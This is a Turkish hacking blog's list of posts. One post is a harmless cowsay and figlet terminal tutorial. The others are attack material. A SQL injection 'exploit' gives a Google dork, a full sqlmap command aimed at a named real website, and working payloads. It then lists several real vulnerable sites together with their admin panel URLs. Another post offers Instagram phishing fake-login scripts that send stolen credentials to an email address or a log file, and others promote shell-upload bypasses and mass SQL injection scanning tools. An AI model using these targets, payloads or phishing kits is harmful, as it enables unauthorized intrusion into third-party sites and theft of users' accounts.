-->
Home » Posts filed under trazer

Kali Linux Cowsay & Figlet

12:09:00

Kali Linux Cowsay & Figlet
Selamun Aleyküm ...

GNU / Linux Terminalinizi Figlet ve Cowsay ile nasıl güzelleştireceğinizden bahsettim.
ilk olarak "apt-get install figlet " komutuyla figleti kuruyoruz
ardından ; Cowsay = "apt-get install cowsay" yazarak kurun.

Yeni bir terminal açıp root dizinindeyken (pwd) leafpad .bashrc dosyasını açınız. en alt satıra inerek;

figlet Nickiniz & Yada yazmak ıstedıgınız seyi yazınız.

Örnek: 
figlet TrazeR . org
/usr/games/cowsay -f  stegosaurus " Cyber-WarrioR.org "

cowsayı nasıl ekledık derseniz ;

cd /usr/share/cowsay/cows/ komutla cowsayın bulundugu dızıne girip ls komutuyla listeledikten sonra rasgele ascii hedef seçip dosya yolunu belirttiken sonra -f komutuyla kullanmak ıstedıgım ascii.cow'u belirttim " tırnak içinde istedigim metni yazdim"
Sonuç :
Cowsay Bazi Kullanım Örnekleri
/usr/games/cowsay -b TrazeR ===> bunu bashrc dosyanıza bu şekilde eklerseniz her terminali açtıgınızda aşağıdaki örnek resim gibi açılır.

/usr/games/cowsay -d Dead  ===> -d parametresi inegin ölü görünmesini saglar. İnek Öldü başımız saolsun

/usr/games/cowsay -g açgözlü inek modu ===> -g parametresi inegi aç gözlü moda alır. bizim inek canlandi.


 /usr/games/cowsay -p paronaya inek ===> -p parametresi ineği paronaya yapar.

/usr/games/cowsay -t yorgun inek

 /usr/games/cowsay -f dragon Cyber-WarrioR AKINCILAR ===>
–f seçeneği, kullanılacak belirli bir inek resmi dosyasını (cowfile) belirtir. Bu örnekte size bir ejderha resmi gösteriyorum. 
 Genel Olarak Kullanim: /usr/games/cowsay –f <cowfile> mesajiniz


                                                                           Video:



Credits Previcinidesign Sql Injection Vulnerability

15:51:00


KOD:
#################################################################################
# Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id=
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 2017-12-01
# Vendor Home: http://www.previcinidesign.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs

Parameter: idCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idCat=25 AND 3326=3326

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idCat=25 AND SLEEP(5)


Demo:
http://www.onoya.it/it/menu.php?idCat=25
http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15
http://www.osteopatiassociati.it/casi-scheda.php?ID=29
http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7

Panel:
http://www.onoya.it/aps
http://www.amarcordpiadineria.it/admin/
http://www.osteopatiassociati.it/admin/
http://ibrubinetterie.com/admin/

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
Special Thanks TurkZ.org All Staff

Linux Server Bypass C1 & Ln -s

20:59:00


Selamun Aleyküm...

Yapılanlar gayet açık ve net, tek sıkıntı 42. saniyede excute kısmından komut verirken mkdir yazmamişim. 
"mkdir TURKZ" yazarak yenı bı dizin oluşturabilirsiniz .videoda karışmıs hatlar direk turkz yazmışız yanlış yere (: Shelin make dir kısmından TURKZ yazarakda direk dizin açabilirsiniz.

Video: 

İnstagram Phishing Fake Login Script

16:20:00

Selamun Aleykum..

İki Adet İnstagram Fake Login Sayfası War Elimde Sizlerle Paylasmak İstedım.
Birincisi Biraz amatör, Mail Adresıne Gönderıyor Bilgileri 

İkincisi Biraz Daha Orjınal Ama ingiliççe :)
Bunun Logları Sunucuda Bulundugu Dizıne Gelİyor logger.txt Metin Belgesine

Script Dowloand: İnstagram Phishing

Video:

Kali Linux TNscan

17:24:00

Selamun Aleyküm ..

TNscan Script Özellikleri:

1.Tüm web sitelerini al
2.Joomla web sitelerini al
3.WordPress web sitelerini edinin
4.Kontrol paneli bul
5.Zip dosyalarını bulun
6.Kurulum dosyalarını bulun
7.Sunucu kullanıcılarını edinin
8.SQL enjeksiyonundan tara
9.SQL enjeksiyonundan tarama ve tarama (yakında)
10.Tarama portları (liman aralığı)
11.Tarama portları (ortak portlar)
12.Sunucu afişini alın
13.Cloudflare'yi atla
14.Hakkında!
15. Çıkış

[CODE]git clone https://github.com/voletri/TNscan.git[/CODE]

Sunucudaki Tüm Sitelerde SQL Taramasi Yapabilir Wordpress Joomla Gibi Siteleride Bulabilir.
Kullanişli Script Kullanmanizi Tavsiye Ederim.

Video: 

Kali Linux TheMole Automatic SQL Injection Exploitation Tool

20:31:00

Selamun Aleyküm ...

Kali Linux TheMole otomatik SQL Enjeksiyon sömürme aracı

TheMole, bir komut satırı arabirimi SQL Enjeksiyon sömürme aracıdır.
Bu uygulama union-based, blind, boolean-based dayali Enjeksiyonlardan yararlanabilir.
The Mole, Mysql, Mssql ve Postgresql'i desteklemektedir;
apt-get update
apt-get install themole yazarak kurabilirsiniz.




SQL Injection Using Burp Suite And Sqlmap

14:54:00

Selamun Aleyküm ..

Burpsuite SQLMapper Co2

Bu uzantı, Burp'un kabiliyetlerini arttırmak için çeşitli modüller içeriyor.

Uzantının her Co2 modülü için alt sekmeli kendi yapılandırma sekmesi vardır. Diğer Burp araçlarıyla etkileşim kuran modüller Co2 yapılandırma sekmesinden devre dışı bırakılabilir, bu nedenle işlevselliğin bir bölümünü kullanırken tüm uzantıyı devre dışı bırakmaya gerek yoktur

CO2 aşağıdaki modülleri içerir:
SQLMapper, bir sqlmap yardımcı. Burp'taki herhangi bir isteği sağ tıklatın ve SQLMapper'e isteği göndermek için yeni bir menü seçeneği göreceksiniz. SQLMapper ekranı, istekle birlikte URL, POST verileri (varsa) ve Çerezler (varsa) ile önceden doldurulmuş olarak görünür. Ardından, ihtiyacınız olan diğer seçenekleri ayarlayabilir ve sonra SQLMap Komutunu komut satırında sqlmap'e kopyalayıp / yapıştırabilirsiniz.

CeWLer - HTML dosyalardan bir wordlist çıkartmak için Digininja'nın komut satırı CeWL komut dosyasına dayanan bu sürüm doğrudan Burp'un içindeki yanıtların bir listesiyle birlikte çalışır.

Masher - Öğütücü - Kelimelerin bir tohum listesi ve bir şifre belirtimi göz önüne alındığında, bu araç olası şifrelerin bulanık bir listesini oluşturacaktır. Masher, verilen listeden gelen kelimeleri birleştirerek başlayacak, ardından yeni şifreler oluşturmak için karakterleri ekleyecek ve değiştirecektir.

BasicAuther - Bir kullanıcı adı listesi ve bir şifre listesi verildiğinde, o zaman daha sonra Hırsız alanına atılabilecek uygun BasicAuth dizeleri çıktılacaktır.

Name Mangler - Bazı adları ve alanları verildiğinde, onları geçerli girişleri test etmek için Intruder'a düşebilecek potansiyel kullanıcı adlarının bir listesini oluşturmak için harekete geçirir.

Video: 


Kali Linux Burpsuite Shell Upload Bypass

12:22:00

Selamun Aleyküm ..

Kali Linux 2017.1 Burpsuite (Professional) Shell Upload Bypass





Fan Sesi İçin Kusura Bakmayın :)